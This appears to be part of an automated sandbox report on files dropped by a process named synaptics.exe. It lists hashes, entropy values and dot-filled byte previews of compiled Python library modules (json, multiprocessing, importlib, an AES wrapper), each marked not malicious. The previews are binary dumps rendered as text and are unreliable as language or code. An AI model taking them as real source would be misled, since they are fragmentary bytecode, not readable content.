                                                                                                                                                                                                            Preview:o.......Z.,dr........................@...s....d.d.l.m.Z...d.d.d...Z.d.S.)......)...filterfalseNc....................c...sf.....t...}.|.j.}.|.d.u.r.t.|.j.|...D.].}.|.|.....|.V...q.d.S.|.D.].}.|.|...}.|.|.v.r0|.|.....|.V...q.d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seenZ.seen_add..element..k..r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\metadata\_itertools.py..unique_everseen....s..................................r....).N)...itertoolsr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2288
                                                                                                                                                                                                            Entropy (8bit):4.738157884292716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lpgnzBuSda0E0UuJpYwj1JEZNmsZBCdHEjX9vlq:ngNuaa0xUAp/j1JErm8BCdHED90
                                                                                                                                                                                                            MD5:06505A8050EF26E03612A4F213B7D145
                                                                                                                                                                                                            SHA1:91DD29C4DF72258D47AB4E665A67919E6B2B44BC
                                                                                                                                                                                                            SHA-256:03CD7A683504BBBEF7CA84BA9BA76C75AAD84E302B050D65C4C94479948958CB
                                                                                                                                                                                                            SHA-512:59CC27046A84A3A3EA61054F5A441EEFE5E990201BDA94F00CF5B35E0AD4028F4F8D5AAD216DF2CBC620E4EE3B8E424386F81734C4CA61E319DA8A2B283A4AA1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sP...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc....................@...s....e.Z.d.Z.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e...f.d.d...Z.d.d.e.d.e.d.e.e.e...e.f...f.d.d...Z.e.d.e.e.e.e.e.e...f...f...f.d.d.....Z.d.S.)...PackageMetadata..returnc....................C........d.S...N......selfr....r.....GC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\metadata\_meta.py..__len__...........z.PackageMetadata.__len__..itemc....................C...r....r....r....).r....r....r....r....r......__contains__....r....z.PackageMetadata.__contains__..keyc....................C...r....r....r....).r....r....r....r....r......__getitem__....r....z.PackageMetadata.__getitem__c....................C...r....r....r....r....r....r....r......__iter__....r....z.PackageMetadata.__iter__...name..failobjc....................C........d.S.).zP. Retur
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3084
                                                                                                                                                                                                            Entropy (8bit):5.063812749406986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:LhFXWTrbGowYRzHinOrIAeQc2u4Kr0OqugqhFqYbvHqILqtk3RO/8C9HqL7dRjqu:bowCmVAeQgbqfq/qIqoqu9UHqHdRjqqL
                                                                                                                                                                                                            MD5:62912C80E3FD6CE62531C71DB13D1BAC
                                                                                                                                                                                                            SHA1:B9766BE973D2D691F13B3900E02DF2B804B3E1AD
                                                                                                                                                                                                            SHA-256:32F9F74B9E79D5561857CC6BA4DC88A6BB2449AAE0031482A07078E915D657FB
                                                                                                                                                                                                            SHA-512:FCB96A1DC910D307AC84238BD2671815A8799CA24162E67685F794DAD773CF5C5179968A533D190A8C6BE8E933D679C68FC4F57102A13E2DFA82E92D2F219657
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s(...d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N.....)...method_cachec........................sr...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e...f.d.d.....Z.d.d...Z.d.d.d...Z.....Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCa
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                            Entropy (8bit):5.385390523265271
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:XM0k25NKigD6B7+vx1GkRGqb9j4ytKv72vx1GkRGqb4MmQTQOQkQsx1LtbQkQsxz:XM0TNKigBvx99j4g3vxx47OZrXZrb/
                                                                                                                                                                                                            MD5:E5D40A9E8C8F19F050A5F1969575F577
                                                                                                                                                                                                            SHA1:8D954A3601D5EACDDB922B5D6FF1E32E3C2AAB50
                                                                                                                                                                                                            SHA-256:14650CF8FBF354C60985B3F9CFD4E98EA32DB898B87B87C9BB8D65332C49F6B8
                                                                                                                                                                                                            SHA-512:8F835E52B219DAD67327CB250489775FC038D5939436CC9F52AF10735EF1A4EE78AF6A8ACA39AEAA409CC357A990E44C95CF2588D801B583405F344EDA93A98E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d+8.......................@...s....d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d...Z.d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)). {"
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9790
                                                                                                                                                                                                            Entropy (8bit):5.5689596653783004
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zEe7Hw9dSfu7lO+V4F9euIL0t1gwaF8mbANHFThJt7AeIsk9uYE5:QsHw9dT8+w9elwt28muIt4YQ
                                                                                                                                                                                                            MD5:0FAF423047E75115C2D9AA0A5E9AB8AF
                                                                                                                                                                                                            SHA1:CA4816CA33996B5D147C722F49795697C9A29EAA
                                                                                                                                                                                                            SHA-256:C040CF9236188ACF5B36686BB9150E4FC259B9F74D18465BEDE5610BD85BB42D
                                                                                                                                                                                                            SHA-512:01C7D7EDD6E0980B901DAEB7F2CFD718CC9486360D4DFEF2F584CA7E251D54BA0F2144554A1980BADAADF974556A0CDEF840663EF9FD51C6438A962A5577431C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.2.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.d.g.Z.e.j.e.j.B.e.j.B.Z.e.d...Z.e.d...Z.e.d...Z.G.d.d...d.e...Z.e.e.e.d...Z.e...d.e...Z.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.e.e.j.f.d.d...Z.e.phe.Z.e...d.e...Z.d.Z.d.e.j.e.f.d.d...Z.e.j.e.f.d.d ..Z.G.d!d...d.e...Z.d.S.)"z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c....................C...sb...|...d.d.|...d...}.|.|...d.d.|.....}.d.|.|.|.|.f...}.t...|.|.....|.|._.|.|._.|.|._.|.|._.|.|._.d.S.).N...r.........z.%s: line %d column %d (char %d))...count..rfind..ValueE
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11141
                                                                                                                                                                                                            Entropy (8bit):5.498819429424781
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:fqB3Tkkgsft4MszI6lxnP14KAZX/WPxDvoLabuHyjnFibetRv4UO4FR0Q:ydDiMUnd4CPxDzbuS7FiTEd
                                                                                                                                                                                                            MD5:55584CDD3E3FFDF5E444B1B34570C79E
                                                                                                                                                                                                            SHA1:4DA6A01EBFAA84E4346935D464DAC05DE60238B1
                                                                                                                                                                                                            SHA-256:DF04220ACFB3504726A3C2257CA2D8472F0F5016FFC9309CCD768F635506242A
                                                                                                                                                                                                            SHA-512:B7354DA7C3334E7F0ECD066CA17BF4094CE3A018DF3B4B8FDD29C775BAB2EA16B1AC32B91AE61D432CBE483C771766300496E9CBA625C4E04E3D41073E9CE39C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.@.......................@...s6...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yA......d.Z.Y.n.w.e...d...Z.e...d...Z.e...d...Z.d.d.d.d.d.d.d.d...Z.e.d...D.].Z.e...e.e...d...e.......q_e.d...Z.d.d...Z.e.pxe.Z.d.d...Z.e.p.e.Z.G.d.d...d.e...Z.e.e.e.e.e.e.e.e e!e.j"f.d.d...Z#d.S.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc....................C........d.d...}.d.t...|.|.....d...S.).z5Return a JSON representation of a Python string.. c....................S...s....t.|...d.....S.).Nr....)...ESCAPE_DCT..group)...match..r.....;C:\Users\user\AppData\Local\xFSOj9El1Q\lib\json\encoder.py..replace(...s......z%py_encode_basestring.<locals>.replacer....)...ESCAPE..sub....sr....r....r....r......py_encode_basestring$...s........r....c.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1940
                                                                                                                                                                                                            Entropy (8bit):5.60836953056975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lvwhn/cfelN3xf9oI0rv3y1R0vSFkU9VTdOIC54vD:S0MFLoPwHTd9CeD
                                                                                                                                                                                                            MD5:A3E275B4629D233955005933C17E23CD
                                                                                                                                                                                                            SHA1:36239E1CDE7712D404EF5838D8A0DD6332F1E96B
                                                                                                                                                                                                            SHA-256:CABDC31DB8093036987920955142AA2542FCAE2FF5712A0F822D6BBF0FF1C229
                                                                                                                                                                                                            SHA-512:4D09A77198E15D415BFEF36E7D63658942EAD14004CE1BD0B2DBDFCCA4C85C6BDBCB1183AD53E7EC55D96BB5633EA2469D4AC84F460F0558B81D24783954E5A0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sh...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.g.Z.e...d.e.j.e.j.B.e.j.B...Z.d.d...Z.e.p1e.Z.d.S.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c........................sv...|.j...|.j...|.j...t.j...|.j...|.j...|.j...|.j...|.j...|.j...|.j...........................f.d.d.........f.d.d...}.|.S.).Nc........................s....z.|.|...}.W.n...t.y.......t.|...d...w.|.d.k.r...|.|.d.......S.|.d.k.r0..|.|.d...f.............S.|.d.k.r=..|.|.d...f.....S.|.d.k.rQ|.|.|.d.......d.k.rQd.|.d...f.S.|.d.k.re|.|.|.d.......d.k.red.|.d...f.S.|.d.k.ry|.|.|.d.......d.k.ryd.|.d...f.S...|.|...}.|.d.u.r.|.....\.}.}.}.|.s.|.r...|.|.p.d...|.p.d.....}.n...|...}.|.|.....f.S.|.d.k.r.|.|.|.d.......d.k.r...d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.t.|.....).N..".......{..[..n.....Z.null..t..trueT..f.....Z.falseF....N.......NaN..I.......Infinity..-.....z.-Infinit
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):66915
                                                                                                                                                                                                            Entropy (8bit):5.227096142753104
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:QdNU29zPGlE+L/8P4CcmsaS+rtz8lEp6wQh++5+VCKlv+g7tXcEOokQ02BbB:Qdy07e/8P4pmRSe58a6+rIZWLVxB
                                                                                                                                                                                                            MD5:C6FF67AB6946A2200F41773CCB461BAA
                                                                                                                                                                                                            SHA1:2932F4753F8F327207E30328699C0ABFC6AABE73
                                                                                                                                                                                                            SHA-256:FA6EB2206B95A83C83113E71192A004A7113A388BEBB32E748EB85ADA1B5278C
                                                                                                                                                                                                            SHA-512:5CF27DE982C54ACF034505E531BB7AC5CC73486A5F966E15B9289D30CEDD6D86A88234145BA20FE3D3C9725CC66B52B5D5DA101AC713CDB87BBC84740E798707
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d=B.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.....Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z.d.Z.d.Z d.Z!e.d.e.d.e.d.e.d.e d.e!d.i.Z"e.e.e.e.e.e.e e!d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e.j(.)e%j*j+..Z,d d!..Z-e.....Z/d"d#..Z0d$d%..Z1e&e.d&..s.d'd(..Z2n.e..3..Z4d)d(..Z2d*d+..Z5e.j6e0e5e1d,....G.d-d...d.e7..Z8e8a9d/d0..Z:d1d2..Z;d3d4..Z<e...Z=[.G.d5d6..d6e7..Z>G.d7d8..d8e>..Z?G.d9d:..d:e>..Z@d;ZAe>eAf.e?d<f.e@d=f.d>..ZBG.d?d@..d@e7..Z.e...ZCG.dAdB..dBe7..ZDG.dCdD..dDe7..ZEG.dEdF..dFe7..ZFe..G..ZHg.ZIdGdH..ZJdIdJ..ZKG.dKdL..dLeF..ZLG.dMdN..dNeL..ZMG.dOdP..dPeM..ZNG.dQdR..dReM..ZOeOe...ZPePZQG.dSdT..dTe7..ZRdUdV..ZSdWdX..ZTG.dYdZ..dZe7..ZUG.d[d\..d\eF..ZVG.d]d^..d^eV..ZWeVaXG.d_d`..d`e7..ZYeWe...ZZeZeV_ZeUeVjZ..eV_[dadb..Z\d.dcdd..Z]dedf..Z^dgdh..Z_didj..Z`d.dk..dldm..Zadndo..Zbdpdq..Zcdrds..Zddtdu..Zedvdw..Zfe.f.dxdy..ZgeIf.dzd{..Zhd.d.liZiei.jeh..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):693
                                                                                                                                                                                                            Entropy (8bit):5.124963029154462
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CClW2ZWZaX03+H/xoVfAf+fs3NZDCFOPWiO7nmV8om2RDwPpp:lBAd3+oVfFf2NZDyuOiVzJwPpp
                                                                                                                                                                                                            MD5:B70A0AF45BC62DD1CCCB90C5AE152B8C
                                                                                                                                                                                                            SHA1:44BC37894213275D2681C413ABC6C3858318C185
                                                                                                                                                                                                            SHA-256:E2FE0D37D808F6DD5C793C2D249F1DE459DEE99B31B92D6514655689E1E8A792
                                                                                                                                                                                                            SHA-512:4B1BA759394F287B9E3D1A1837B7F68F5F54A2FAF89FB112817C00BF6F45B004EED3D8DBFF2BDF35ABECAD9C57F3797988FA911E837FB4ADA9456F074BFD1D9D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sh...d.d.l.Z.d.d.l.m.Z...d.d...e.e.j...D...Z.e.....d.d...e.D.......d.Z.d.Z.d.e.j.v.r2e.j.d...e.j.d.<.d.S.d.S.)......N.....)...contextc....................C...s....g.|.].}.|...d...s.|...q.S.)..._)...startswith)....0..x..r.....GC:\Users\user\AppData\Local\xFSOj9El1Q\lib\multiprocessing\__init__.py..<listcomp>....s......r....c....................c...s .....|.].}.|.t.t.j.|...f.V...q.d.S.).N)...getattrr......_default_context).r......namer....r....r......<genexpr>....s........r................__main__Z.__mp_main__)...sys..r......dirr......__all__..globals..updateZ.SUBDEBUGZ.SUBWARNING..modulesr....r....r....r......<module>....s......................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12878
                                                                                                                                                                                                            Entropy (8bit):4.849285463432556
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:YkUmlRfTW+lRLdDM6NLUIsLgZxeg0SMfkX0:YCLRLdDM6tIs+fSMfkX0
                                                                                                                                                                                                            MD5:964760BC2C006A272AFB763601E8A754
                                                                                                                                                                                                            SHA1:167C27F680DE10C9F7BCED10565CF31B8E77806A
                                                                                                                                                                                                            SHA-256:156BFE43498D4F3B6EB7CB058A30760CB1F8ACDA8600BAEA27EEAD366C8EA25A
                                                                                                                                                                                                            SHA-512:CD370EBE897C204CFD432868CB068FAE6F2E97033C81DCD3606977AEEEA6F4453185D92194A62CA2F7DF6ED776643A7E32EC60B059662126D5F99A09C86EA4A7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.e.j.d.k.r.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.e...e...e...d!..Z.e.j.d"k.r.e.e.d#....Z.n#e.e.d$....Z.n.G.d%d...d.e.j...Z.G.d&d...d.e...Z.d#e...i.Z.e.e.d#....Z.d'd(..Z.e.....Z.d)d*..Z.d+d,..Z.d-d...Z.d.S.)/.....N.....)...process)...reduction..c....................@........e.Z.d.Z.d.S.)...ProcessErrorN....__name__..__module__..__qualname__r....r....r.....FC:\Users\user\AppData\Local\xFSOj9El1Q\lib\multiprocessing\context.pyr.................r....c....................@...r....)...BufferTooShortNr....r....r....r....r....r........r....r....c....................@...r....)...TimeoutErrorNr....r....r....r....r....r........r....r....c....................@...r....)...AuthenticationErrorNr....r....r....r....r....r........r.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11286
                                                                                                                                                                                                            Entropy (8bit):5.117215548596219
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:eiyKSdzLd8K2X0M65TqXEzvng+JOFZvDzkmq9wNdpB0:eiyKS1CkM6N0Ezvng+UFZrztq9a2
                                                                                                                                                                                                            MD5:1D1634033DCB78B85B78E48B2182ACCC
                                                                                                                                                                                                            SHA1:1FB2651EBC7C19E1838CADDC3C00B7D2FB13C293
                                                                                                                                                                                                            SHA-256:4CD227AD95B95AE9FF27BF89FF2902BAD23C21A6D5DBBEDF50576B9C818B37D3
                                                                                                                                                                                                            SHA-512:0397240B564FCA74EC2971ABFC9988B598E14B8FC017AA5DF5A02E3A8E1FAA57CB423583F168ACB717CF72EEB30D6DA65D780B96F8A7F919521965E7B16FD853
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.0.......................@...s2...g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.e.j...e.......Z.W.n...e.y3......d.Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.a.e...a.e...d...a.e...a.[.i.Z.e.e.j.. ....D.].\.Z!Z"e!d.d.....d.k.r.d.e!v.r.d.e!....e.e"..<.q{e...Z#d.S.).)...BaseProcess..current_process..active_children..parent_process.....N)...WeakSetc....................C........t.S.).z@. Return process object representing the current process. )..._current_process..r....r.....FC:\Users\user\AppData\Local\xFSOj9El1Q\lib\multiprocessing\process.pyr....%..........r....c....................C...s....t.....t.t...S.).zN. Return list of process objects corresponding to live child processes. )..._cleanup..list.._childrenr....r....r....r....r....+...s........r....c....................C...r....).z?. Return process object representing the parent process. )..._parent_processr....r....r....r....r..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8321
                                                                                                                                                                                                            Entropy (8bit):5.185474432172793
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:PFKWKGBxGtTtQEGI1l/1ZmvtX9lZFftyZgq:PpatT0I1ltZmvxjXftyZgq
                                                                                                                                                                                                            MD5:07D1FCA0799AD17412AA860188021EA2
                                                                                                                                                                                                            SHA1:37B056BBB64F79FEC515F4EBF60E9BDFEDDD8E24
                                                                                                                                                                                                            SHA-256:50B55725CF13F127E4CCABE258D07CB47B9BED014C8A8867400E145467BB6399
                                                                                                                                                                                                            SHA-512:FB21647AB3A8C3390633AD9CAF55DB4D9BDA5471C0F2865B683B4E32B29FF61962A9722F5980EF998D6CBA61261840469F34C5EAA0FFA4380A99DD7BED240692
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dA&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.j.d.k.p@e.e.d...o@e.e.d...o@e.e.j.d...Z.G.d.d...d.e.j...Z.e.j.Z.d8d.d...Z.e.j.d.k.r~e.g.d...7.Z.d.d.l.Z.d9d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.n#e.g.d...7.Z.d.d.l.Z.e.j.d.k.Z.d.d...Z.d.d ..Z.d!d...Z.d"d...Z.d#d$..Z.d%d&..Z.G.d'd(..d(..Z e.e!e ..j"..e.....d)d*..Z#e.e!e$j%..e#....e.e!e&j'..e#....d+d,..Z(d-d...Z)e.e.j*e(....e.j.d.k.r.d/d0..Z+d1d2..Z,e.e.j.e+....n.d3d0..Z+d4d2..Z,e.e.j.e+....G.d5d6..d6e.d7..Z-d.S.):.....)...ABCMetaN.....)...context)...send_handle..recv_handle..ForkingPickler..register..dump..win32Z.CMSG_LEN..SCM_RIGHTS..sendmsgc........................sJ...e.Z.d.Z.d.Z.i.Z.e.j.Z...f.d.d...Z.e.d.d.....Z.e.d.d.d.....Z.e.j.Z.....Z.S.).r....z)Pickler subclass used by multiprocessing.c........................s*...t...j.|.....|.j.....|._.|.j...|.j.....d.S...N)...super..__init__.._copyreg_dispatch_table..copy..dispatch_table..upda
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7055
                                                                                                                                                                                                            Entropy (8bit):5.347867103340184
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:oeGQHbITHl5m6xVZaGV/EXODiHu/Eoft7TAUZmniQjzVHd2qE5:oe7Hbk5nn9EXnHhItPdZ9QjI5
                                                                                                                                                                                                            MD5:91D8AC2106FE553FDEF387585A321124
                                                                                                                                                                                                            SHA1:88764EB03F9A6AFAB50217B023EDAE578B4AD58A
                                                                                                                                                                                                            SHA-256:E4D6459487203D168BB15FA62BCFDFE4748110C20A626E9E6DF0490B684AB29E
                                                                                                                                                                                                            SHA-512:49CB77F21170B35BC443A304A03BC3F03A43A521E6E4C411945FB0C66E027B138D65063E2E1E956C03CA2806DF4256A0799A1A14744B8F93E9DD501C29D710D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.#.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e...Z.z.d.Z.e.....rQe.d.e...d.d.....Z.W.n...e.y[......Y.n.w.d.d...Z.d.d...Z.d.d...Z d.Z!d.Z"d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_stop_operation(void *state);.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4983
                                                                                                                                                                                                            Entropy (8bit):5.175961470758332
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SFDtaCGJ/VGx/ux3LM4x6stLAv74PJlQKGW:EwZApu5M4ftcsPzJ
                                                                                                                                                                                                            MD5:76738B6D3AAE84DCE88B3B80AB4A2E4F
                                                                                                                                                                                                            SHA1:7F8AB5DA4E1B5DF2B13B46E56AE3353CE3C4AF6D
                                                                                                                                                                                                            SHA-256:8DF8B2CF15B0859C6EC6A2E79506F98FC24767C5613AA2CC23AC1594D30124CB
                                                                                                                                                                                                            SHA-512:053D3026C6B59E9E30504A3EEE7236E21271072AE0F608C3511C9E5EFCE71FF6B8D97AD356FF1202A9A6058F51E305377DC42272D55C5905B3FDD16978BD0DEB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
